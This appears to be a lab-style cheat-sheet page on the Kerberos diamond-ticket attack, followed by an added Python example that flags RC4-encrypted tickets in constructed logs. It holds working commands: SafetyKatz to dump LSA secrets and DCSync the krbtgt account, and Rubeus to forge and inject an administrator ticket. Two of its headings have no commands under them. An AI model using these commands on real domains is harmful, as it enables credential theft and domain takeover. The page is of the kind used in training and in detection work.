diamond-ticket

Methodology

  1. Retrieve the AES-256 key or RC4 hash of the service account.

  2. Modify and inject the ticket.

  3. Impersonate any user.

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Retrieve the AES-256 key of the service account:

SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'

Rubeus

Create a diamond ticket:

With an NTLM hash (usually flagged by EDRs):

Rubeus.exe diamond /krbkey:32ED87BDB5FDC5E9CBA88547376818D4 /user:studentuserx /password:studentuserxpassword /enctype:rc4 /ticketuser:administrator /domain:us.contoso.local /dc:US-DC.us.contoso.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

With an AES-256 key (admin cmd required):

With access to a domain account:
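The page notes that the RC4 (/enctype:rc4) variant is usually flagged by EDRs. The following is an added detection example, not part of the original page or of Rubeus: it scans constructed Windows 4768/4769-style entries and reports tickets encrypted with RC4-HMAC (0x17) where AES is expected. The line format, field names and IP addresses are assumptions for the demo.

```python
# Added example (not from the original page): flag RC4-encrypted Kerberos tickets
# in constructed 4768/4769-style events, where the domain is expected to use AES.
from dataclasses import dataclass

# Encryption type values as written in the TicketEncryptionType field
# (RC4-HMAC = 0x17, AES256 = 0x12, AES128 = 0x11).
ENCTYPE_NAMES = {
    0x17: "RC4-HMAC",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x11: "AES128-CTS-HMAC-SHA1-96",
}
RC4_HMAC = 0x17


@dataclass
class TicketEvent:
    account: str
    service: str
    enctype: int
    client_ip: str


def parse_event(line: str) -> TicketEvent:
    """Parse one constructed 'Key=Value' event line (assumed format)."""
    fields = dict(part.split("=", 1) for part in line.split())
    return TicketEvent(
        account=fields["TargetUserName"],
        service=fields["ServiceName"],
        enctype=int(fields["TicketEncryptionType"], 16),
        client_ip=fields["IpAddress"],
    )


def rc4_ticket_alerts(lines, aes_expected_services=None):
    """Return events whose ticket used RC4-HMAC.

    If aes_expected_services is given, only tickets for those services are
    reported (accounts still on RC4 for legacy reasons can be left out).
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.enctype != RC4_HMAC:
            continue
        if aes_expected_services is None or ev.service in aes_expected_services:
            alerts.append(ev)
    return alerts


# Constructed sample events, not real log data.
SAMPLE = [
    "TargetUserName=studentuserx@US.CONTOSO.LOCAL ServiceName=US-DC$ TicketEncryptionType=0x12 IpAddress=10.0.0.5",
    "TargetUserName=administrator@US.CONTOSO.LOCAL ServiceName=US-DC$ TicketEncryptionType=0x17 IpAddress=10.0.0.7",
]

if __name__ == "__main__":
    for ev in rc4_ticket_alerts(SAMPLE):
        print(f"ALERT {ENCTYPE_NAMES[ev.enctype]} ticket for {ev.account} -> {ev.service} from {ev.client_ip}")
```

An RC4 ticket alone is not proof of forgery; correlate it with the requesting host and the account's normal encryption types before acting on it.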
